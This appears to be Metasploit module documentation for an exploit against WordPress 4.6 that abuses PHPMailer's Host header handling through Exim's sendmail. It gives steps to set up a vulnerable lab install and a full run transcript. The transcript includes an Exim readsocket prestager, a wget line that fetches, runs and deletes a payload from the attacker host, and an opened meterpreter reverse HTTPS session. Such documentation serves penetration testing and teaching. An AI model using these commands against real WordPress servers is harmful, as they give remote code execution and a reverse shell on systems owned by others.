## Introduction

This vuln has some caveats: you need approximately WordPress 4.6 with
Exim for the `sendmail(8)` command. You do not need to install
PHPMailer, as it is included as part of the WordPress install.

Thanks to WP's awesome practice of backporting the heck out of all their
patches, we need to use a Git clone and check out the vuln release.

## Setup

This was tested on Ubuntu 15.04. YMMV.

1. got root?
2. `cd /var/www/html`
3. `git clone https://github.com/WordPress/WordPress wordpress-4.6`
4. `chown -R www-data:www-data wordpress-4.6`
5. `cd wordpress-4.6`
6. `git checkout 4.6`
7. Set up a MySQL database for WordPress
8. Install as normal

## Options

**VERBOSE**

If you'd like to see what requests are being sent, set this to `true`.
You should see the Exim prestager commands being sent to the target.

## Usage

```
msf > use exploit/unix/webapp/wp_phpmailer_host_header 
msf exploit(wp_phpmailer_host_header) > set rhost 192.168.33.135
rhost => 192.168.33.135
msf exploit(wp_phpmailer_host_header) > set targeturi /wordpress-4.6
targeturi => /wordpress-4.6
msf exploit(wp_phpmailer_host_header) > set lhost 192.168.33.1 
lhost => 192.168.33.1
msf exploit(wp_phpmailer_host_header) > set verbose true
verbose => true
msf exploit(wp_phpmailer_host_header) > run

[*] Started HTTPS reverse handler on https://192.168.33.1:8443
[*] WordPress 4.6 installed at http://192.168.33.135/wordpress-4.6
[*] Generating wget command stager
[*] Using URL: http://0.0.0.0:8080/mbpvuuck
[*] Local IP: http://[redacted]:8080/mbpvuuck
[*] Generating and sending Exim prestager
[*] Sending /bin/sh -c ${run{/bin/echo}{${extract{-1}{$value}{${readsocket{inet:192.168.33.1:8080}{get /mbpvuuck http/1.0$value$value}}}}}}
[+] Sending wget${IFS}-qO${IFS}/tmp/vfotastd${IFS}http://192.168.33.1:8080/mbpvuuck;chmod${IFS}+x${IFS}/tmp/vfotastd;/tmp/vfotastd;rm${IFS}-f${IFS}/tmp/vfotastd
[+] Sending payload linux/x64/meterpreter_reverse_https
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: xyx88vod) Redirecting stageless connection from /nBwfbdUYNjU2TjBMb1VkagG08CfJO-jZYpOxBsWHQMGHh7p5ISjCG3Ze with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://192.168.33.1:8443 handling request from 192.168.33.135; (UUID: xyx88vod) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (192.168.33.1:8443 -> 192.168.33.135:36075) at 2017-05-16 14:25:28 -0500
[*] Sending /bin/rm -f /tmp/vfotastd
[*] Server stopped.

meterpreter >  
```